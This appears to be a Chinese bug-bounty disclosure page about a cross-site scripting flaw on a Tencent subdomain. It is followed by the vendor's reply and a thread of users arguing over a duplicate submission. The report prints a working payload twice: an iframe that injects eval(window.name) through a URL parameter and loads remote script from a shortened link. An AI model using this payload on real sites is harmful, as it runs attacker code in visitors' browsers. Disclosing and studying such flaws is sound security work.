腾讯子站存在XSS漏洞允许执行远程js代码

废话不多说！ 整段给你发上来！ 技术人员自己去看！影响很大!<iframe src="http://dkf.qq.com/demopage.html?ticket=mjmjmjmjmjmj*/e=eval;e(window.name);/*mjmjmjmjmjmj" name='al=document.createElement("script"); al.src="//t.cn/RG0OuXB";/*mojiexss*/document.body.appendChild(al);'>

<iframe src="http://dkf.qq.com/demopage.html?ticket=mjmjmjmjmjmj*/e=eval;e(window.name);/*mjmjmjmjmjmj" name='al=document.createElement("script"); al.src="//t.cn/RG0OuXB";/*mojiexss*/document.body.appendChild(al);'>

过滤

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2016-03-01 10:06

厂商回复：

非常感谢您的报告。该问题已经通过其它渠道发现并已着手处理。如您有进一步发现，请及时与我们联系。如果您有任何的疑问，欢迎反馈，我们会有专人跟进处理。

最新状态：

暂无

1. 2016-02-29 14:18 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

   1

   mark

   1# 回复此人

2. 2016-02-29 16:46 | 李旭敏 ( 普通白帽子 | Rank:848 漏洞数:116 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

   1

   不会又双投了吧

   2# 回复此人

3. 2016-02-29 18:44 | 遗失的秘密 ( 路人 | Rank:4 漏洞数:3 | xss 跨站脚本 研究小白)

   1

   啥叫双投

   3# 回复此人

4. 2016-03-01 12:00 | sangfor.org ( 实习白帽子 | Rank:54 漏洞数:26 | 天下熙熙，皆为利来； 天下攘攘，皆为利往...)

   1

   还不如不确认 直接公开 无良

   4# 回复此人

5. 2016-03-01 12:00 | sangfor.org ( 实习白帽子 | Rank:54 漏洞数:26 | 天下熙熙，皆为利来； 天下攘攘，皆为利往...)

   1

   ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎

   5# 回复此人

6. 2016-03-01 21:41 | 遗失的秘密 ( 路人 | Rank:4 漏洞数:3 | xss 跨站脚本 研究小白)

   1

   非常感谢您的报告。该问题已经通过其它渠道发现并已着手处理。如您有进一步发现，请及时与我们联系。如果您有任何的疑问，欢迎反馈，我们会有专人跟进处理。 真是够了！

   6# 回复此人

7. 2016-03-01 21:48 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

   1

   @遗失的秘密 你双投还怪别人，醉了。。

   7# 回复此人

8. 2016-03-02 02:39 | 遗失的秘密 ( 路人 | Rank:4 漏洞数:3 | xss 跨站脚本 研究小白)

   1

   你去腾讯 那里看下 怎么可能双投！ 就我这一个漏洞举报的！

   8# 回复此人